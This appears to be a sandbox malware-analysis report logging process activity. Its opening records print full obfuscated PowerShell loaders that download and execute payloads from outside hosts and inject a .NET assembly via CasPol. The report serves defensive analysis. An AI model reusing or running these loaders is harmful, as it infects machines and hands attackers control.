Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_0041BCF3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_03000A9D pushad ; iretd	3_2_03000ABD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_03000AD5 pushad ; iretd	3_2_03000ABD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07572506 push esp; iretd	3_2_07572515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0424144C push FFFFFFF5h; iretd	8_2_0424145E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0424137C push ebx; iretd	8_2_042413DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_042413CC push ebx; iretd	8_2_042413DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00434006 push ecx; ret	12_2_00434019
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004567F0 push eax; ret	12_2_0045680E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0045B9DD push esi; ret	12_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00455EBF push ecx; ret	12_2_00455ED2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,

12_2_00406128

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_00419BD4

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

12_2_0041BCF3

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
